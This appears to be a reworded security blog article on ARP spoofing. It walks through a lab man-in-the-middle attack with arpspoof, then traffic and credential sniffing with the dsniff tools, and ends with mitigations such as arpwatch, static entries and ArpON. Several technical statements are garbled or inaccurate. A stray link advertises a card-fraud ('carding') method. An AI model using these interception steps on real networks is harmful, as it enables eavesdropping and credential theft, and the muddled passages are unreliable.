In this article we will learn about Attacking the ARP.
Introduction about Attacking the ARP:
Address Resolution Protocol (ARP) is used to translate IP addresses to MAC addresses (hardware addresses). Computers on a network send messages to each other via MAC addresses. In the initial phase of communication, computers are only aware of their assigned IP addresses on the network. ARP plays a role in making an ARP request from a requesting device on the network by querying the IP addresses on the receiving device for the MAC address. The receiving network device responds with an ARP reply for further communication. Technically speaking, ARP translates from the network layer to the data link layer of the OSI model.
The translation of IP addresses to MACs using ARP is similar to how DNS helps translate IP addresses to domain names. One of the main similarities they both have is that they need to work around new network connections. To speed up the process and prevent repetition, a cache is stored. Usually there is a DNS cache and for ARP the ARP cache is stored in the ARP table.
ARP spoofing is when an attacker impersonates another computer on the network by telling the network gateway to request the victim’s MAC address from its IP address. The same process is repeated in reverse with the victim so that the victim sees the attacker’s IP address as the ARP gateway address.
The figure below illustrates a typical ARP operation:
This image is the same as the process above but with an attacker in the picture:
At this capture point, the attacker receives all data intended for the victim from the gateway and vice versa. The default result will be to break communication between the victim and the gateway. Packets meant for the victim would not reach him and the victim may be suspicious. To avoid this, the attacker forwards packets from the victim’s gateway and does the same back to the gateway.
Make it all a reality! On a Windows machine, run arp -a
command lists the cache of all neighboring IP addresses with their MAC addresses. It works the same way on Mac and Linux, but our victim here is Windows.
Although we see that the IP address 192.168.1.1 translates to the hardware address d4:ca:6d:fc:43:9f, the attacker will launch an ARP proxy (spoof) against this address. The ARP cache on the victim computer, as seen above, consists of dynamic and static entries. To monitor how the victim computer is communicating with the gateway, I run a continuous ping from the victim computer to the gateway device using the Windows ping -t command.
During this test, the following IP addresses are used:
192.168.216.2 → Gateway device
192.168.216.129 → Victim address
192.168.216.130 → Attacker address
A continuous response from a continuous ping indicates that there is a proper connection between the victim and the default gateway.
Since ARP replies contain replies to MAC addresses from the network device, the attacker’s goal is to flood ARP replies to both the target and the remote host. To achieve this, the arpspoof command line tool is used on a Linux box.
The -i switch is used to specify the network interface, -t is for the target host, and -r is for the remote host. The remote host pretends to be the one sending the ARP replies, and the destination host is the host receiving the reply.
ARP cache poisoning involves poisoning the victim user’s cache by flooding it with ARP replies containing MAC addresses to proxy hosts. This was achieved in the last step above. ARP spoofing is a technique to achieve ARP cache poisoning.
Any kind of network snooping can be done at this point. You can view images from a victim’s browser with driftnet, get emails with mailsnarf, URLs with urlsnarf, IM messages with msgsnarf, sniff files from NFS traffic with filesnarf, and capture packets with wireshark or ettercap.
While I had driftnet active on the attacker, I opened the contributors page here at the InfoSec Institute and got the following:
Just to be a more prying attacker, I had a tmux session with mailsnarf, msgsnarf, and urlsnarf monitoring on 3 panes.
I won’t show what the end results of those were, as I’d be putting my privacy in jeopardy by doing so.
Okay, I will be nice enough to show results from urlsnarf and dsniff:
While urlsnarf was grabbing the URLs, I also kept dnsiff monitoring the victim, and there was an FTP authentication attempt that prompted this:
The dsniff suite also provides multiple MITM tools including sshmitm, webmitm, and webspy.
An old way to achieve something similar, but not quite as specific, is to use another tool from the dsniff suite called macof, and oh! I didn’t mention that arpspoof is also from the dsniff suite. Macof floods switched LAN ports with random MAC addresses.
It seems too noisy, and since it’s just starting to flood, I’m only considering it as an option when considering ARP spoofing as a Denial-Of-Service asset.
ARP spoofing attacks would be impossible if there was an authentication mechanism for ARP replies.
Mitigating ARP spoof attacks
Prevent duplicate MAC addresses: This can be achieved by using a good intrusion detection system (IDS). It can be set to detect heavy ARP traffic, duplicate MACs and MAC floods. Looking closer at Figure 9, there are two IP addresses with the same MAC 00-0C-29-81-19-63, which needs to be avoided.
Monitor ethernet/IP address pairings. Arpwatch or ArpSNMP really comes in handy when trying to use it. It is a Unix utility.
Use static ARP entries. As seen above, the affected entries in the victim’s ARP cache were dynamic entries.
Arpwatch and Arpsnmp were mentioned earlier. Another good tool for taking preventive measures against ARP attacks is Arpon.
Before I discuss the arpon further, I would also like to discuss the arping tool. Arping works just like the ping command line tool. Unlike the ping command, which checks whether hosts are reachable by domain names or IP addresses and then translates domain names to IP addresses, arping translates pinged IP addresses to MAC addresses and also allows MAC addresses to be pinged directly using an interface specified by – and. switch.
ARPON is an ARP processing control tool that ensures ARP. It uses two techniques for this. SARPI (Static ARP Inspection) and DARPI (Dynamic ARP Inspection). These two techniques protect against both distributed attacks and bidirectional attacks, as we have shown with macof and arpspoof. In order to properly use Arpon bidirectional protection, it should be installed on both network devices including the target and remote host, which are our victim machines and default gateway. To prevent distributed attacks, Arpon should be installed on all computers in the LAN.
Arpon has a daemon that starts from boot when installed on a computer. It helps fight ARP poisoning attacks using SARPI and DARPI by blocking them, while tools like Arpwatch and Arpsnmp only alert you to the presence of an attack.
Also Read:Amazone carding 2023 method
ARP attacks involved exploiting the fact that ARP translates addresses from the network layer of the OSI model to the data link layer without any form of authentication. By sending redundant ARP replies, an attacker can trick a target computer into thinking it can be reached by the hardware address of another computer on the network.
One of the main ways to prevent this is to avoid duplicating the MAC in the ARP cache. Various tools have been mentioned for mitigation, but Arpon seems to be the most powerful tool at the moment. A future with IPv6 can help put an end to similar attacks.